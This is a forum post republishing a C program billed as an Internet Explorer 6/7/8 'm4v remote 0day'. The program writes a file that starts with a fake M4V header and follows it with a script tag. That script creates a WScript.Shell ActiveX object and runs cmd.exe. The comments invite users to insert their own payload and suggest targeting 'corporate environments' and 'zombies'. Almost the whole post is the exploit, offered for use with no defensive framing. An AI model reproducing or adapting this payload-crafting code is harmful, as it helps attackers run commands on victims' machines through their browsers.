Internet Explorer version 6, 7, and 8 m4v file parsing remot

d3v1l · August 22, 2008

Internet Explorer version 6, 7, and 8 m4v file parsing remote zero day exploit.

/*

Internet Explorer m4v Remote 0day
Jeremy Brown (0xjbrown41@gmail.com)

~Faithful Subjects~
Tested VULNERABLE: Windows XP Pro SP2 + IE 6 (really...)
                   Windows Vista  SP1 + IE 7 (really???)

~Interesting Enough~
Tested IMMUNE:     Windows XP Pro SP2 + Firefox 2 (assume 3 as well)
                   Windows XP Pro SP2 + Opera   9
		           Windows XP Pro SP2 + Safari  3
                   Windows Vista  SP1 + Firefox 2 (likewise)

DISCLAIMER: No, the code execution will not work under default settings, but your own code probably will.
            May be quite useful in, hrmmm, corporate environments, intranets, silly zones, zombies and/or water polo cults.

*/

#include <stdio.h>
#include <stdlib.h>

char m4vdata[] = "\x00\x00\x00\x20\x66\x74\x79\x70\x4D\x34\x56\x20"
                 "\x00\x00\x00\x01\x4D\x34\x56\x20\x4D\x34\x41\x20"
                 "\x6D\x70\x34\x32\x69\x73\x6F"; // take a guess

char cti[] =     "<script>var ex=new ActiveXObject('WScript.Shell');ex.run('cmd.exe');</script>"; // insert your own scripting code and you could win a million bucks! 

int main(int argc, char *argv[])
{

if(argc < 2)
{
    printf("\nIE6/7/8? m4v Remote 0day\n");
    printf("Usage: %s <file.m4v>\n\n", argv[0]);
    return 0;
}

char *m4v = argv[1];
int i = 0;
FILE *fd;

    printf("\nIE6/7/8? m4v Remote 0day\n");
    printf("Creating malicious %s for ownage...\n\n", argv[1]);

fd = fopen(m4v, "wb");
fwrite(m4vdata, 1, sizeof(m4vdata), fd);
fwrite(cti,     1, sizeof(cti),     fd);
fclose(fd);

    printf("Good Day SIR. I said GOOD DAY SIR!!!\n\n");

    return 0;

}

Sign In

Internet Explorer version 6, 7, and 8 m4v file parsing remot

Recommended Posts

d3v1l

Join the conversation

Browse

Activity

Pages